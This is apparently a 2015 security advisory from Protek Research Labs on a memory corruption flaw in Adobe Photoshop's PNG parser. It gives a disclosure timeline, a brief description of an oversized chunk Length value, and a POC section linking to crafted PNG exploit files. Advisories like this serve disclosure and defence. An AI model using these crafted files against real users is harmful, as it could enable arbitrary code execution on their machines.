Secunia:
{PRL}: 2015-08
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Labs found the issue;
2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)
#####################################################################################
============================
3) Technical details
============================
An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-08.png
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37349.png
###############################################################################